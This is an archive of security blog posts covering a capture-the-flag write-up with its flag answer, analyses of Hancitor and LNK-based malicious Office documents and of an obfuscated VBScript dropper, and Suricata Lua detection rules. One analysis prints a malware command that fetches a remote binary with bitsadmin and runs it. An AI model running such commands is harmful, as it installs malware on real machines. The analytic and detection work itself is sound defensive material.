Monthly Archives: March 2017

CSCBE Challenge Write-up – Trace Me

This is the first post in a series of write-ups on some of the challenges that were tackled by students during our Cyber Security Challenge Belgium this month.


All challenges of the Cyber Security Challenge Belgium are created by security professionals from many different organisations. The TraceMe challenge in particular was created by Vasileios Friligkos, one of our distinguished challenge contributors.

The challenge

At your day job, per your recommendation and after many requests, you recently activated host-based monitoring using Sysmon.

Perfect! You are now going to have visibility on each host of your IT system, giving you perfect awareness and detection capabilities that will be able to thwart even the most persistent attackers…
Before you can finish your thoughts, you get interrupted by a phone call:
“Steve”, (yes, this is you) says an irritated voice on the other side of the line.
– “Yes…”, replies Steve (yep, still you).
“Your awesome monitoring system did not work, we got an infection.”
– “But there are no detection rules implemented yet, it’s normal that we didn’t… “, you start explaining when you get interrupted.
“At least, tell me you can identify how the infection occurred!”
Eh, yes sure I can…

And by that, the irritated voice (who by the way is your boss) hangs up and sends you one file with the Sysmon log data of the infected host.

Can you identify the benign (non malicious) process that was abused and was ultimately responsible for the infection?
Can you also identify the IP from where the second stage was downloaded (the first connection made by the malware)?

If so, you will be able to save your reputation and also get the points for this challenge by submitting the SHA1 of the abused, benign process (Uppercase) + the IP where the second stage is hosted.

Good luck Steve!

The solution

Evtx is the Windows event log file format, which makes sense since Sysmon writes to the “Applications and Services Logs/Microsoft/Windows/Sysmon/Operational” event folder.

There are many ways to start interacting with these events; there is even an official Windows log parser that can query event log data.
If we go this way, we have to download LogParser and run the following command to extract all logs in CSV format:

$> LogParser.exe -i:EVT -o:csv "SELECT * from sysmon.evtx" > sysmon.csv

This gives us a .csv file with 3,021 log lines of different sizes and types.
By checking the description of Sysmon on the MS site we see that the following types of events can be logged:

  • Event ID 1: Process creation
  • Event ID 2: A process changed a file creation time
  • Event ID 3: Network connection
  • Event ID 4: Sysmon service state changed
  • Event ID 5: Process terminated
  • Event ID 6: Driver loaded
  • Event ID 7: Image loaded
  • Event ID 8: CreateRemoteThread
  • Event ID 9: RawAccessRead
  • Event ID 10: ProcessAccess
  • Event ID 11: FileCreate
  • Event ID 12: RegistryEvent (Object create and delete)
  • Event ID 13: RegistryEvent (Value Set)
  • Event ID 14: RegistryEvent (Key and Value Rename)
  • Event ID 15: FileCreateStreamHash
  • Event ID 255: Error

OK, there are many interesting events that we could use. In the file, we see that we have events of types 1, 2, 3, 5 and 6.
Since we do not have any initial information to start investigating from and then pivot back to the initial infection, we need to search for abnormal or at least unusual behaviour.
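As a starting point for spotting unusual behaviour, the distribution of event types can be tallied with a few lines of Python. This is only a sketch: it assumes the LogParser CSV export carries an EventID column, and the rows below are a made-up stand-in for sysmon.csv rather than the challenge data.

```python
import csv
import io
from collections import Counter

def count_event_ids(csv_file):
    """Return a Counter mapping each Sysmon event ID to its number of rows."""
    reader = csv.DictReader(csv_file)
    return Counter(int(row["EventID"]) for row in reader)

# Tiny in-memory stand-in for sysmon.csv (hypothetical rows, not the challenge data).
sample = io.StringIO(
    "EventID,Message\n"
    "1,Process Create\n"
    "3,Network connection detected\n"
    "3,Network connection detected\n"
    "5,Process terminated\n"
)
event_counts = count_event_ids(sample)
for event_id, count in sorted(event_counts.items()):
    print(f"Event ID {event_id}: {count}")
```

With the real export, the file would be opened with open("sysmon.csv", newline="") instead of the in-memory sample. The csv module also copes with commas inside quoted fields.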

For example, we see that we have only one event ID 6 but by investigating the name of the driver and its SHA we realise that it concerns a legitimate driver.

Since there are not that many logs, we could use Excel to try to make some sense of them, for example by colouring the log lines based on the event ID.

If we zoom out and simply scroll over the logs, we see a sudden burst of network activity at one point:


On closer inspection, we see that there are many UDP requests to port 6892 by a “roaming.exe” process found in “C:\Users\TestPC\AppData\”, with adjacent destination IPs in the same subnet:


This surely looks suspicious and we could take this lead for our investigation, but let’s say that we don’t go this way (Steve doesn’t like Excel) and we prefer to put our ninja awk skills to use!

Some parsing is necessary since the comma is the field separator but is also found inside the fields, and there is much useless information that we can dump.
In this case, let’s replace the field separator with the pipe (“|”) so that we can use awk easily. Let’s also separate the process creation events (event ID 1, file sysmon_process_creation.csv) from the connection events (event ID 3, file sysmon_connections.csv).

For process creation, we keep the following fields:


Let’s filter the data and search for some unusual execution locations or uncommon process names:

awk -F "|" '{ print "Process:"$3 }' sysmon_process_creation.csv | sort | uniq -c | sort -rn


We see two executables from the %AppData% directory:

  • “Roaming.ExE”
  • “OneDrive.exe”

We can pull their SHA1 hashes and check online whether they are legitimate. Doing so does not clearly reveal whether either of them is malicious.

If we try to see the parent processes:

  • “Roaming.ExE” -> powershell and roaming.exe
  • “OneDrive.exe” -> explorer

Hmm, powershell could be something worth investigating, let’s show also the parent process full command:


Ok, this surely looks bad: powershell launched a hidden download of an executable which was also executed at the end of the command.
So, at last, we have our investigation lead: roaming.exe

For information, we could also have used the connections log file to help us spot outliers.
By sorting and counting unique occurrences of processes and target IPs (as we did for the process creation logs), we do not get a clear result because there are too many chrome.exe processes reaching out to multiple IPs:

awk -F "|" '{ printf "Process: %-90s DST:%s:%s\n",$3,$13,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


But if we ignore the destination IP and focus only on the destination port, then we should have a clearer view:

awk -F "|" '{ printf "Process: %-90s DST_Port:%s\n",$3,$15 }' sysmon_connections.csv | sort | uniq -c | sort -rn


Roaming.exe communicated 1,088 times over port 6892 (UDP), and a quick online search for that port leads directly to the Cerber malware.
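The awk one-liner above can also be sketched in Python. The column positions mirror the awk fields $3 and $15. The sample lines are hypothetical and only illustrate the counting.

```python
from collections import Counter

def count_process_ports(lines, process_col=2, port_col=14):
    """Count (process, destination port) pairs in pipe-separated connection logs."""
    counts = Counter()
    for line in lines:
        fields = line.rstrip("\n").split("|")
        if len(fields) <= max(process_col, port_col):
            continue  # skip malformed or truncated lines
        counts[(fields[process_col], fields[port_col])] += 1
    return counts

def make_line(process, port):
    """Build a hypothetical 15-field line with only the fields we use filled in."""
    fields = [""] * 15
    fields[2], fields[14] = process, port
    return "|".join(fields)

sample_lines = (
    [make_line("roaming.exe", "6892")] * 3
    + [make_line("chrome.exe", "443")] * 2
    + [make_line("chrome.exe", "80")]
)
port_counts = count_process_ports(sample_lines)
for (process, port), count in port_counts.most_common():
    print(f"{count:5d} Process: {process} DST_Port:{port}")
```

Grouping on the port rather than the IP is what makes the outlier stand out: a process that talks to many hosts on one unusual port collapses into a single, very large bucket.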

In both cases, we have roaming.exe which looks malicious and by following its parent process PID we can trace the activities and the initial infection:

  • Roaming.exe PID: 1868 was created by powershell.exe PID: 2076
  • Powershell.exe PID: 2076 was created by cmd.exe PID: 2152

(We notice that there are two processes with the same PID: 2152 – “cmd.exe” and “Acrobat Reader DC\Reader\reader_sl.exe”; keep in mind that PID’s can be reused)

  • Cmd.exe PID: 2152 was created by winword.exe PID: 2232

The parent of winword.exe is explorer.exe, which is legitimate. We can therefore deduce that winword.exe was abused (probably by a macro), which resulted in cmd.exe launching a powershell command to fetch the second stage malware (probably Cerber according to OSINT).
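Following parent PIDs by hand works for a short chain, but the walk can also be sketched in code. The record layout below is an assumption made for illustration. The PID for explorer.exe and the parent of reader_sl.exe are made up. Keying on both PID and image name is one simple way to cope with the PID reuse noted above.

```python
def trace_ancestry(events, pid, image):
    """Walk parent links from (pid, image) back to the earliest known ancestor.

    Matching on both PID and image name avoids confusing two processes
    that reused the same PID.
    """
    by_key = {(e["pid"], e["image"]): e for e in events}
    chain = [(pid, image)]
    key = (pid, image)
    while key in by_key:
        event = by_key[key]
        key = (event["parent_pid"], event["parent_image"])
        if key in chain:
            break  # guard against loops in malformed data
        chain.append(key)
    return chain

# PIDs taken from the write-up; PID 1500 for explorer.exe and the parent of
# reader_sl.exe are made-up values for illustration.
events = [
    {"pid": 1868, "image": "roaming.exe", "parent_pid": 2076, "parent_image": "powershell.exe"},
    {"pid": 2076, "image": "powershell.exe", "parent_pid": 2152, "parent_image": "cmd.exe"},
    {"pid": 2152, "image": "reader_sl.exe", "parent_pid": 1500, "parent_image": "explorer.exe"},
    {"pid": 2152, "image": "cmd.exe", "parent_pid": 2232, "parent_image": "winword.exe"},
    {"pid": 2232, "image": "winword.exe", "parent_pid": 1500, "parent_image": "explorer.exe"},
]
chain = trace_ancestry(events, 1868, "roaming.exe")
print(" <- ".join(f"{image} ({pid})" for pid, image in chain))
```

This still breaks if the same image reuses the same PID. Sysmon's ProcessGuid and ParentProcessGuid fields are a more robust key when they are available in the export.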

Therefore, the first part to the solution is the SHA1 of winword.exe:

  • CE3538D04AB531F0526C4C6B1917A7BE6FF59938

For the second part, we need to identify the IP of the site from which the second stage was downloaded.
From the powershell command we know that the domain is footarepu[.]top, but instead of resolving the domain name (the record might have changed since the infection), we can find the IP in sysmon_connections.csv since we have the PID and process name of all the connections.
Searching for powershell.exe PID: 2076 we find one contacted IP over port 80:


which is the second part of the solution.
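The lookup itself is a simple filter on PID, process name and port. A minimal sketch, assuming the connection events have already been parsed into dictionaries with the hypothetical keys shown below (only the powershell.exe row mirrors the write-up, the other rows are invented):

```python
def connections_for(connections, pid, image, port=None):
    """Return destination IPs contacted by the process identified by pid and image."""
    return sorted({
        c["dst_ip"]
        for c in connections
        if c["pid"] == pid
        and c["image"].lower() == image.lower()
        and (port is None or c["dst_port"] == port)
    })

# Hypothetical connection records; only the powershell.exe row mirrors the write-up.
connections = [
    {"pid": 2076, "image": "powershell.exe", "dst_ip": "35.165.86.173", "dst_port": 80},
    {"pid": 1868, "image": "Roaming.exe", "dst_ip": "192.0.2.10", "dst_port": 6892},
    {"pid": 3004, "image": "chrome.exe", "dst_ip": "198.51.100.7", "dst_port": 443},
]
second_stage_ips = connections_for(connections, 2076, "powershell.exe", port=80)
print(second_stage_ips)
```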

Flag: CE3538D04AB531F0526C4C6B1917A7BE6FF59938_35.165.86.173

Good job Steve!

New Hancitor maldocs keep on coming…

Didier Stevens will provide NVISO training on malicious documents at Brucon Spring: Malicious Documents for Blue and Red Teams.

For more than half a year now we see malicious Office documents delivering Hancitor malware via a combination of VBA, shellcode and embedded executable. The VBA code decodes and executes the shellcode, the shellcode hunts for the embedded executable, decodes and executes it.

From the beginning, the embedded executable was encoded with a bit more complexity than a simple XOR operation. Here in the shellcode we see that the embedded executable is decoded by adding 3 to each byte and XORing with 17. A final base64 decoding step then yields the EXE.
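The decoding steps described here can be sketched in Python as follows. This is an illustration, not the shellcode itself: it assumes the addition wraps around at one byte and treats the constants 3 and 17 as decimal values. The encode_payload helper is hypothetical and exists only to produce demo input.

```python
import base64

def decode_payload(encoded, add_value=3, xor_key=17):
    """Add add_value to each byte, XOR with xor_key, then base64-decode."""
    stage1 = bytes(((b + add_value) & 0xFF) ^ xor_key for b in encoded)
    return base64.b64decode(stage1)

def encode_payload(plain, add_value=3, xor_key=17):
    """Inverse of decode_payload, used here only to build demo input."""
    b64 = base64.b64encode(plain)
    return bytes(((b ^ xor_key) - add_value) & 0xFF for b in b64)

original = b"MZ\x90\x00\x03\x00\x00\x00 demo payload"
encoded = encode_payload(original)
decoded = decode_payload(encoded)
print(decoded[:2])
```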


The gang behind Hancitor steadily delivered new maldocs without changing much about this encoding method. That changed about 2 months ago, when we started to see samples where the XOR key was a WORD (2 bytes) instead of a single byte.

Recently we received a sample that changed the encoding of the embedded executable again. This sample still uses macros, shellcode and an embedded executable:


The encoded shellcode is still in a form (stream 16), and the embedded executable is still in data (stream 5), appended after a PNG image:


If we look at the embedded executable, we see that the pattern has changed: in the beginning, we see a pattern of 4 repeating bytes. This is a strong indication that the group started to adopt a DWORD (4 bytes) key:


We can try to recover the XOR key by performing a known plaintext attack: up until now, the embedded executables were base64 encoded and started with TVqQAA… Let’s use xor-kpa to try to recover the key:


We still find no key after trying out all add values between 1 and 16. Could it be that this time, it is just XOR encoded without addition? Let’s try:


Indeed! The key is xP4?.
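The idea behind a known plaintext attack on a repeating XOR key fits in a few lines. The sketch below is not how xor-kpa is implemented; it is a simplified illustration that assumes the known plaintext sits at the very start of the data. The demo input is built from the key reported above.

```python
import base64
from itertools import cycle

def xor_bytes(data, key):
    """XOR data with a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def recover_xor_key(ciphertext, known_plaintext, max_key_len=8):
    """Recover a repeating XOR key, assuming the plaintext starts with known_plaintext."""
    keystream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
    # Only key lengths shorter than the keystream can be checked for repetition.
    for key_len in range(1, min(max_key_len, len(keystream) - 1) + 1):
        candidate = keystream[:key_len]
        if xor_bytes(keystream, candidate) == bytes(len(keystream)):
            return candidate
    return None

KNOWN = b"TVqQAA"  # start of a base64-encoded PE file
key = b"xP4?"      # key reported in the write-up, used to build the demo input
plain_b64 = base64.b64encode(b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00")
ciphertext = xor_bytes(plain_b64, key)
recovered = recover_xor_key(ciphertext, KNOWN)
print(recovered)
```

With only six known bytes, a four-byte key is confirmed by just two repeated positions, so a real analysis would want a longer known plaintext or a sanity check on the decoded output.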

We can now decode and extract the embedded executable:





The gang behind Hancitor has been creating complex malicious documents to deliver their malware, and we constantly have to keep our analysis techniques up to date.

.LNK downloader and bitsadmin.exe in malicious Office document

We received a malicious Office document (529581c1418fceda983336b002297a8e) that tricks the user into clicking on an embedded LNK file, which in turn uses the Microsoft Background Intelligent Transfer Service (BITS) to download a malicious binary from the internet.

The following Word document (in Japanese) claims to be an invoice; the user must click the Word icon to generate the amount to be paid.


When we analyze this Word document, we get the following output:


As you can see, an embedded OLE object is present in stream 8. Using the following options we can obtain information on what exactly this embedded OLE object is: -s 8 -i ./document_669883.doc


The embedded object is thus an LNK file. We can then use the following options to get a hexdump of what this LNK file actually contains: -s 8 ./document_669883.doc


When going through this hexdump we can spot the intentions of this LNK file:


Now, to make this a bit easier to read we can use the following options: -s 8 -d document_669883.doc

Which provides the following output:


Opening the LNK file will execute the following command:

C:\Windows\System32\cmd.exe %windir% /c explorer.exe & bitsadmin.exe /transfer /priority high hxxp://av.ka289cisce[.]org/rh72.bin %AppData%\file.exe & %AppData%\file.exe

When looking at the timestamps of the Word document, we noticed that the file was last saved on 2017-03-22 19:20:00. The first sighting of this file on VirusTotal was already at 2017-03-22 23:15:59 UTC, less than 4 hours after it was last saved. This could explain why the link containing the binary file was no longer active at the time of our analysis (12 hours after the first sighting on VirusTotal).

If you want to check if your organisation has been impacted by a similar document, you can detect the malicious downloads by looking through your proxy logs and searching for the following user agent: “Microsoft BITS/*”. While multiple software packages use BITS to download updates, their number is currently still fairly limited. Filtering for unique destination hosts will reduce your dataset enough for you to spot the outlier(s) easily.
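As a rough illustration of that hunt, the sketch below counts destination hosts for requests whose user agent starts with “Microsoft BITS/”. The record layout (host and user_agent keys) and the sample entries are assumptions. Real proxy logs would first need to be parsed into this shape.

```python
from collections import Counter

def bits_destinations(records):
    """Count destination hosts contacted with a 'Microsoft BITS/' user agent."""
    hosts = Counter()
    for record in records:
        if record.get("user_agent", "").startswith("Microsoft BITS/"):
            hosts[record["host"].lower()] += 1
    return hosts

# Hypothetical, already-parsed proxy log entries (malicious host kept defanged).
proxy_log = [
    {"host": "download.windowsupdate.com", "user_agent": "Microsoft BITS/7.5"},
    {"host": "download.windowsupdate.com", "user_agent": "Microsoft BITS/7.5"},
    {"host": "av.ka289cisce[.]org", "user_agent": "Microsoft BITS/7.5"},
    {"host": "www.example.com", "user_agent": "Mozilla/5.0"},
]
bits_hosts = bits_destinations(proxy_log)
# Rarely contacted hosts are listed first, since outliers are what we are after.
for host, count in sorted(bits_hosts.items(), key=lambda item: item[1]):
    print(f"{count:4d} {host}")
```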

Developing complex Suricata rules with Lua – part 2

In part 1 we showed a Lua program to have Suricata detect PDF documents with obfuscated /JavaScript names. In this second part we provide some tips to streamline the development of such programs.

When it comes to developing Lua programs, Suricata is not the best development environment. The “write code & test”-cycle with Suricata can be quite tedious. One of the reasons is that it takes time. It can take 1 minute or more to start Suricata with the new rule, and have it process a test pcap file. And if there are errors in your Lua script, Suricata will not be of much help to identify and fix these errors.

Inspired by Emerging Threats Lua scripts, we adopted the following development method:

Test the script with a standalone Lua interpreter, and move to Suricata for the final tests.

This is one of the reasons why, in part 1, we put the logic of our test in function PDFCheckName which takes a string as input and is called by the match function. By doing this, we can also call (and test) the function from other functions with a standalone Lua interpreter as shown below:

function Test()
    print(PDFCheckName("testing !!!", true))
    print(PDFCheckName("testing /JavaScript and more /J#61vaScript !!!", true))
    print(PDFCheckName("testing /JavaScript and !!!", true))
    print(PDFCheckName("testing /J#61vaScript !!!", true))
end

This Test function calls PDFCheckName with different strings as input. We also added extra print statements to the function (see complete source code below), which are activated by the second argument of function PDFCheckName. This boolean argument, bVerbose, adds verbosity to our function when the argument is true.

We can load the Lua program in a Lua interpreter, and then call function Test. One way to do this is type command “lua -i PDFCheckName.lua”, and then type Test() at the Lua prompt. This can all be scripted in a single command like this:

echo Test() | lua -i PDFCheckName.lua

With the following result:


This “code & run”-cycle is faster than using Suricata, and can be more verbose. Of course, you can also do this with an IDE like Eclipse.

We also added a function TestFile that reads a file (the PDFs we want to test), and then calls PDFCheckName with the content of the PDF file as the argument:


This produces the following output:


Being able to test a PDF file directly is also a big advantage compared to having to create a PCAP file with an HTTP request downloading the PDF file to test.


By using functions and a standalone Lua interpreter, we can significantly improve the development process of Lua programs for Suricata.


-- 2017/02/20

-- echo Test() | lua53.exe -i test.lua
-- echo TestFile() | lua53.exe -i test.lua javascript.pdf

tBlacklisted = {["/JavaScript"] = true}

function PDFCheckName(sInput, bVerbose)
    if bVerbose then
        print('sInput: ' .. sInput)
    end
    for sMatchedName in sInput:gmatch("/[a-zA-Z0-9_#]+") do
        if bVerbose then
            print('sMatchedName: ' .. sMatchedName)
        end
        if sMatchedName:find("#") then
            local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)
            if bVerbose then
                print('sNormalizedName: ' .. sNormalizedName)
            end
            if tBlacklisted[sNormalizedName] then
                if bVerbose then
                    print('Blacklisted!')
                end
                return 1
            end
        end
    end
    if bVerbose then
        print('Not blacklisted!')
    end
    return 0
end

function init(args)
    return {["http.response_body"] = tostring(true)}
end

function match(args)
    return PDFCheckName(tostring(args["http.response_body"]), false)
end

function Test()
    print(PDFCheckName("testing !!!", true))
    print(PDFCheckName("testing /JavaScript and more /J#61vaScript !!!", true))
    print(PDFCheckName("testing /JavaScript and !!!", true))
    print(PDFCheckName("testing /J#61vaScript !!!", true))
end

function TestFile()
    -- The file to test is passed as the first argument after the script name
    local file = io.open(arg[1])
    print(PDFCheckName(file:read("*all"), true))
    file:close()
end

Developing complex Suricata rules with Lua – part 1

The Suricata detection engine supports rules written in the embeddable scripting language Lua. In this post we give a PoC Lua script to detect PDF documents with name obfuscation.

One of the elements that make up a PDF, is a name. A name is a reserved word that starts with character / followed by alphanumerical characters. Example: /JavaScript. The presence of the name /JavaScript is an indication that the PDF contains scripts (written in JavaScript).

The PDF specification allows for the substitution of alphanumerical characters in a name by a hexadecimal representation: /J#61vaScript. #61 is the hexadecimal representation of letter a. We call the use of this hexadecimal representation in names “name obfuscation”, because it is a simple technique to evade detection by engines that just look for the normal, unobfuscated name (/JavaScript).

There is no limit to the number of characters in a name that can be replaced by their hexadecimal representation. That makes it impossible to write a Suricata/Snort rule (using content, pcre, …) that will detect all possible obfuscations of the name /JavaScript. However it is easy to write a program that normalizes obfuscated names (pdfid does this for example).

Fortunately, Suricata has supported the programming language Lua for some time now. Let’s take a look at how we can use this to detect PDF files that contain the obfuscated name /JavaScript (FYI: all PDF files we observed with an obfuscated /JavaScript name were malicious, so it’s a good test to detect malicious PDFs).

A Suricata Lua script has to implement 2 functions: init and match.

The init function declares the data we need from Suricata to be able to do our analysis. For the PDF document, we need the HTTP response body:

function init(args)
    return {["http.response_body"] = tostring(true)}
end

The match function needs to contain the actual logic to analyze the payload. We need to retrieve the HTTP response body, analyze it, and return 1 if we detect something. When nothing is detected, we need to return 0.

In this example of the match function, we detect if the HTTP response body is equal to string test:

function match(args)
    a = tostring(args["http.response_body"])
    if a == "test" then
        return 1
    else
        return 0
    end
end

To detect obfuscated /JavaScript names we use this code:

tBlacklisted = {["/JavaScript"] = true}

function PDFCheckName(sInput)
    for sMatchedName in sInput:gmatch("/[a-zA-Z0-9_#]+") do
        if sMatchedName:find("#") then
            local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)
            if tBlacklisted[sNormalizedName] then
                return 1
            end
        end
    end
    return 0
end

Function PDFCheckName takes a string as input (sInput) and then starts to search for names in the input:

for sMatchedName in sInput:gmatch("/[a-zA-Z0-9_#]+") do

For each name we find, we check if it contains a # character (i.e. if it could be obfuscated):

if sMatchedName:find("#") then

When this is the case, we try to normalize the name (replace #hexadecimal with corresponding ANSI code):

local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)

And finally, we check if the normalized name is in our blacklist:

if tBlacklisted[sNormalizedName] then
    return 1

In that case we return 1. And otherwise we return 0.
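For readers who want to experiment with the normalization logic outside Suricata, here is the same idea sketched in Python. It is a port for illustration only, not something Suricata can run. The names pdf_check_name, NAME_RE and HEX_ESCAPE_RE are introduced here and do not appear in the Lua script.

```python
import re

BLACKLISTED = {"/JavaScript"}
NAME_RE = re.compile(r"/[a-zA-Z0-9_#]+")
HEX_ESCAPE_RE = re.compile(r"#([a-fA-F0-9]{2})")

def pdf_check_name(data):
    """Return 1 if data contains an obfuscated, blacklisted PDF name, else 0."""
    for name in NAME_RE.findall(data):
        if "#" not in name:
            continue  # like the Lua version, only obfuscated names are reported
        normalized = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), name)
        if normalized in BLACKLISTED:
            return 1
    return 0

results = [
    pdf_check_name("testing !!!"),
    pdf_check_name("testing /JavaScript and more /J#61vaScript !!!"),
    pdf_check_name("testing /JavaScript and !!!"),
    pdf_check_name("testing /J#61vaScript !!!"),
]
print(results)
```

Note that a plain, unobfuscated /JavaScript name is deliberately not reported: only names containing a # escape are normalized and compared.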

The complete Lua script:

tBlacklisted = {["/JavaScript"] = true}

function PDFCheckName(sInput)
    for sMatchedName in sInput:gmatch("/[a-zA-Z0-9_#]+") do
        if sMatchedName:find("#") then
            local sNormalizedName = sMatchedName:gsub("#[a-fA-F0-9][a-fA-F0-9]", function(hex) return string.char(tonumber(hex:sub(2), 16)) end)
            if tBlacklisted[sNormalizedName] then
                return 1
            end
        end
    end
    return 0
end

function init(args)
    return {["http.response_body"] = tostring(true)}
end

function match(args)
    return PDFCheckName(tostring(args["http.response_body"]))
end

To get Suricata to run our Lua script, we need to copy it in the rules directory and add a rule to call the script, like this:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"NVISO PDF file lua"; flow:established,to_client; luajit:pdfcheckname.lua; classtype:policy-violation; sid:1000000; rev:1;)

Rule option luajit allows us to specify the Lua script we want to execute (pdfcheckname.lua).

That’s all there is to do to get this running.

But on production systems, we will quickly get into trouble because of performance issues. The rule that we wrote will get the Lua script to execute on all HTTP traffic with incoming data. To avoid this, it is best to add pre-conditions to the rule so that the program will only run on downloaded PDF files:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"NVISO PDF file lua"; flow:established,to_client; file_data; content:"%PDF-"; within:5; luajit:pdfcheckname.lua; classtype:policy-violation; sid:1000000; rev:1;)

This updated rule checks that the file starts with %PDF- (that’s an easy trick to detect a PDF file, but be aware that there are ways to bypass this simple detection).

For some environments, checking all downloaded PDF files might still cause performance problems. This updated rule uses a regular expression to check if the downloaded PDF file contains a (potentially) obfuscated name:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"NVISO PDF file lua"; flow:established,to_client; file_data; content:"%PDF-"; within:5; pcre:"/\/.{0,10}#[a-f0-9][a-f0-9]/i"; luajit:pdfcheckname.lua; classtype:policy-violation; sid:1000000; rev:1;)

Note that in the regular expression of this rule we expect that the name is not longer than 11 characters (that’s the case with the name we want to detect, /JavaScript). So if you add your own names to the blacklist, and they are longer than 11 characters, then update the regular expression in the rule.
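The effect of the length limit is easy to check outside Suricata. The sketch below applies an equivalent pattern with Python's re module. The name /EmbeddedFile is only a hypothetical example of a longer blacklist entry.

```python
import re

# Python equivalent of the rule's pcre:"/\/.{0,10}#[a-f0-9][a-f0-9]/i"
PREFILTER = re.compile(r"/.{0,10}#[a-f0-9][a-f0-9]", re.IGNORECASE)

def prefilter_matches(text):
    """Return True when text would pass the rule's regular-expression pre-condition."""
    return PREFILTER.search(text) is not None

checks = {
    "/J#61vaScript": prefilter_matches("/J#61vaScript"),
    "/JavaScrip#74": prefilter_matches("/JavaScrip#74"),
    "/JavaScript": prefilter_matches("/JavaScript"),
    # Hypothetical longer name: 12 characters precede the '#', so it is missed.
    "/EmbeddedFile#73": prefilter_matches("/EmbeddedFile#73"),
}
for name, matched in checks.items():
    print(f"{name}: {matched}")
```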


Support for Lua in Suricata makes it possible to develop complex analysis methods that would not be possible with simple rules, however performance needs to be taken into account.

In part 2 of this blog post, we will provide some tips to help with the development and testing of Lua scripts for Suricata.

Analyzing obfuscated scripts using nothing but a text editor

In this blog post, we will perform an analysis on some obfuscated scripts that we received. These files were already detected by automated scanners but as these are mainly malware droppers, we figured it could be interesting to do some manual analysis to determine where the actual malware is hosted.

The first sample we will investigate is a .wsf file. This type of file is a Windows script file and can contain various scripting languages. In this case, we’re dealing with an obfuscated VBScript.


Due to the obfuscation, it’s impossible to see at first sight what this script is trying to accomplish. We could run it in a virtual machine and dynamically monitor actions taken by the script such as network connections or processes started, but first we’d like to have an idea of the code.

Some script code structures that are interesting to look for are functions that execute commands, such as:

  • Execute
  • Eval
  • ExecuteGlobal
  • Exec

In the script above, we can identify some “eval” statements and “executeglobal”. When the script is started, it will first run “InItIalIZe()”, followed by “ExecGlOBal()”. Let’s take a look at the contents of the Initialize function.


The first statement assigns a large encoded string to a variable. Not much we can do there. The second statement performs a split on the encoded string using “chr(EvAl(31080/740))”. If you calculate 31080/740 off the top of your head, you get 42. Unsurprisingly, using “chr()”, this is translated to “*”, which is used as the splitting character in the obfuscated string. Don’t panic.

In the next step, a loop runs through all the integers from the string above, translates them to characters and appends them to one large string. This string is then passed as the parameter to the “ExecuteGlobal” command.
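The decoding performed by the script can be reproduced in a couple of lines of Python. This sketch assumes each item between separators is a plain decimal character code. The encoded string below is a made-up example, far shorter than the one in the sample.

```python
def decode_char_codes(encoded, separator=chr(31080 // 740)):
    """Split on the separator and turn each integer into its character."""
    return "".join(chr(int(code)) for code in encoded.split(separator) if code)

# Hypothetical encoded string; the real sample's payload is far longer.
encoded = "87*83*99*114*105*112*116*46*69*99*104*111"
decoded = decode_char_codes(encoded)
print(decoded)
```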


We can piggyback on the deobfuscation that the malicious script is already performing by itself. Instead of letting it execute the deobfuscated code in the “ExecuteGlobal” command, we replace this command by something that will print the parameter to output. For Windows scripting, we can do this using “Wscript.echo”.


Using a command prompt and the “wscript” command, we can run the modified script. Our printing command shows us the decoded output in a pop-up window, which is too small to contain the entire code:


Copy-pasting the entire text is not feasible either. Luckily, there’s an alternative: “cscript”. Using “cscript file.wsf > deobfuscated.txt” we can print the deobfuscated string to a new file.

The result is similar to what we started with. We will follow the same approach again and replace the “execute” with a new printing statement and save the script as .vbs. Alternatively, we could surround the script with a “<job>” and “<script>” tag and specify the scripting language in the “<script>” tag. Then we could save and run the script as .wsf, similarly to the original script.


Now we get something that is actually readable. Nice! At first sight, we can see the script runs some persistence commands, including writing the script to startup folders and adding some registry keys. This is interesting but these are not the juicy details we were looking for. We’ve added the persistence code below, along with the relevant parameters.


What follows is a loop that looks a lot more interesting. We can see that it makes a POST call using host and port parameters that are defined at the start of the script. The user-agent is set using pre-defined parameters as well (client & auth). This might allow the malware authors to determine what version of their malware is trying to communicate back to them. This is also a reason why user-agent string monitoring can be interesting for security analysts. Anomalies such as these can easily be detected.


Based on the result of this POST call, the script continues its execution through one of three functions. All of them make use of the function “D()”, that is defined a bit further in the code, presumably for deobfuscation of the POST response. The two quotes functions seem to be unused (for now).


If we want to further analyse this script, we need to have a response from the command and control server. The time to actually run the script has come!

Running the script

When executing the script and sniffing the traffic using Wireshark, we can see the POST call flying by, containing the user-agent set by the script. The response is another encoded string, prefixed with “s0”. We can use Wireshark’s “Export Objects” functionality to extract the response. If we go back to the script, we can see a case statement for this string. Looks like “Func0” will be executed on our newly obtained string! Time to let the script do the deobfuscation by replacing the execution command in “Func0” and pasting the obfuscated C&C response in our script! Note that we snipped most of the obfuscated string for the image below. Don’t forget to quit the loop or it’ll keep on running.


The final script we receive is not obfuscated at all. It looks like this malware is fingerprinting our computer. Adding an additional “echo” command would show us the information contained in the “ret” parameter. We can give you a small hint: it’s our computer and user name, OS, anti-virus, etc. being sent through a POST call to the C&C. We also observed this call in the traffic capture from before, so we could export the contents through Wireshark as well. There’s a sample of the AV fingerprinting code below.


Unfortunately, we won’t be able to figure out what the other functions (Func1 & Func2) do, since the command and control server did not send us any other command. Some possible causes could be that it decided our system is not interesting based on the information it received or it might just have been in an information gathering phase. If you want more information on this malware, look for Houdini!